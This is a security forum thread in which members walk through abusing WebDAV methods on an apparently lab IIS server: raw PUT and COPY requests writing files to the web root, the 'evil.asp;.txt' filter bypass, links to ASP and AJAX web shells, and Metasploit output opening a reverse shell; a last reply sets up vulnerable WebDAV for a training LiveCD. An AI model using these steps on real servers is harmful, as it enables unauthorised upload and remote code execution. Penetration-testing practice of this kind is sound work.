HTTP header: PUT, DELETE, etc

Viewing 17 reply threads
  • Author
    Posts
    • #5483
      caissyd
      Participant

      Hi,

      When I use Nikto or Nessus to scan a web server, I often get messages like this:


      + OSVDB-0: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
      + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
      + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
      + OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
      + OSVDB-0: HTTP method ('Allow' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
      + OSVDB-0: HTTP method ('Allow' Header): 'PROPPATCH' indicates WebDAV is installed.
      + OSVDB-425: HTTP method ('Allow' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.
      + OSVDB-0: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
      + OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
      + OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
      + OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
      + OSVDB-0: HTTP method ('Public' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
      + OSVDB-0: HTTP method ('Public' Header): 'PROPPATCH' indicates WebDAV is installed.
      + OSVDB-425: HTTP method ('Public' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.

      How can I compromise a server using one of these headers? Can I use the PUT header method to upload a file on the server?

      Couldn’t find anything interesting on Google…

    • #34680
      dynamik
      Participant

      Those are usually indicative of WebDAV, so you could try a WebDAV client. You’ll sometimes find that a OPTIONS / HTTP/1.0 will show a lot of methods like that, but you’ll get a 501 Not Implemented when you try to use them. WebDAV may also require authentication. Just google HTTP to see the syntax for using them manually through netcat or something.

    • #34681
      Xen
      Participant

      PUT method can be used to upload a file to the server only if the directory is writable. If the user, with which the website is run, doesn’t have write privileges on a directory, you won’t be able to upload to that directory., even if PUT verb is allowed.

      How do you find if a website allows PUT verb?
      nc -v
      OPTIONS / HTTP/1.0

      How do you know if a directory is writable?
      You can follow a brute-force approach and try every directory.
      You can enumerate the directories used to store user ulploads like images, attachments etc and then try PUT method on each one of these.

      http://upload.thinfile.com/docs/put.php

    • #34682
      caissyd
      Participant

      Thanks guys

      I was successful sending this (using the Burp Suite):

      PUT /test.txt HTTP/1.1
      Host: 192.168.1.199
      Content-Length: 6

      Yesss!

      Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google…

    • #34683
      caissyd
      Participant

      Got some nice ASP code here:
      http://classicasp.aspfaq.com/general/how-do-i-execute-a-ping-command-from-asp-and-retrieve-the-results.html

      But I can’t create .asp files. Only .txt…

      Nothing is easy!  :-

    • #34684
      Xen
      Participant

      I guess you should now be able to upload an asp script which provides a remote shell.

      http://skypher.com/index.php/2010/03/04/aspsh-a-remote-shell-written-in-asp/
      Note: I’ve never used the above script.

      Edit: I was a few seconds late.
            You should be able to create to more than just .txt files. Can you please try again?

    • #34685
      caissyd
      Participant

      I tried again and this code doesn’t work:

      PUT /test.asp HTTP/1.1
      Host: 192.168.1.199
      Content-Length: 6

      Yesss!

      These file types work:

      • .txt
      • .html
      • .htm
      • .js
      • .vbs

      Maybe I am missing something in the HTTP header…

    • #34686
      Xen
      Participant

      Are you getting any specific error message or just the code isn’t working?

    • #34687
      caissyd
      Participant

      I get a 404 Object Not Found when I try to access it.

      All the other ones are there. Could it be that, by default, IIS prevent us from creating .asp files remotely?

    • #34688
      dynamik
      Participant

      Can you use MOVE to rename it from a txt to an asp? I’m not that familiar with this stuff, but it might be worth a try.

    • #34689
      Xen
      Participant

      I just read an article which might solve your problem. I didn’t understand how to take elements from this article and word it exactly for your problem, so I’m just linking it here (Being just a college student, I’ve my limitations ;)). http://blogs.msdn.com/b/david.wang/archive/2005/08/20/why-can-i-upload-a-file-without-iis-write-permission.aspx

    • #34690
      caissyd
      Participant

      Thanks for the article, but it doesn’t solve my problem… 🙁

      I am working on COPY and MOVE right now…

    • #34691
      KrisTeason
      Participant

      Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google…

      Maybe this may help?
      http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html

    • #34692
      caissyd
      Participant

      Great reading!

      If you try to upload an .asp you’ll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you’ll get a forbidden. 🙁

      This is exactly my problem. But:

      Thankfully there is a “feature” of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.

      I was all excited, but the server doesn’t seem to be running this version of Windows (nmap -O couldn’t pin point the OS…)

      I tried:

      COPY /test.txt HTTP/1.1

      Host: 192.168.1.199

      Destination: http://192.168.1.199/test.asp;.txt

      I found other things on the server, so I will poke at them for a while.

      Thanks guys

    • #34693
      caissyd
      Participant

      It worked!!!

      The Metasploit exploit iis_webdav_upload_asp did the trick:


      msf exploit(iis_webdav_upload_asp) > exploit

      [*] Started reverse handler on 192.168.1.100:4444
      [*] Uploading 612333 bytes to /metasploit161123510.txt...
      [*] Got a 100 response, trying to read again
      [*] Moving /metasploit161123510.txt to /metasploit161123510.asp...
      [*] Executing /metasploit161123510.asp...
      [*] Deleting /metasploit161123510.asp, this doesn't always work...
      [*] Sending stage (240 bytes) to 192.168.1.199
      [*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.199:3409) at Thu Aug 19 14:11:43 -0400 2010

      Microsoft Windows XP [Version 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.

      C:WINDOWSsystem32>     

      ;D

    • #34694
      dynamik
      Participant

      @xXxKrisxXx wrote:

      Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google…

      Maybe this may help?
      http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html

      Wow, that got nasty at the end 😉

      Nice find!

    • #34695
      Jhaddix
      Participant

      DAVtest is a newer tool for testing extensive web server options,

      http://code.google.com/p/davtest/

      it has also been implemented as a Nmap script, check out the scripts directory for more information.

      The default shell it will give you is limited, i replace it with the new meterpreter PHP payload. Or you can supplement with Ironfist’s AJAXShell (clean, better, faster than c99/r57/etc):

      http://sourceforge.net/projects/ajaxshell/

    • #34696
      ethicalhack3r
      Participant

      I’m trying to implement this vulnerability into the up and coming DVWA LiveCD.

      httpd.conf:


      DavLockDB "/opt/lampp/htdocs/hackable/uploads"
      Alias /webdav /opt/lampp/htdocs/hackable/uploads


      Dav On

      Apache is running as user ‘nobody’ in the ‘nogroup’ group.

      I can connect but not execute any commands.Using a webdav client ‘cadaver’ I get an internal server error 500 when trying to execute any commands.

      I assumed this was down to permissions so I changed the permissions as such:

      chown -R nobody /opt/lampp/htdocs/hackable/uploads

      Still no joy.

      The DavTest tool also connects but fails on MKCOL and any PUT requests.

      Any ideas?

      EDIT:–

      Apache 2.2.14, PHP 5.3.1, Ubuntu server 10.04 minimal

      EDIT:–

      Got it working. 🙂

      DavLockDB needs a file name not folder directory. So changed this:

      DavLockDB "/opt/lampp/htdocs/hackable/uploads"

      for this:

      DavLockDB "/opt/lampp/htdocs/hackable/uploads/DavLockDB"
Viewing 17 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?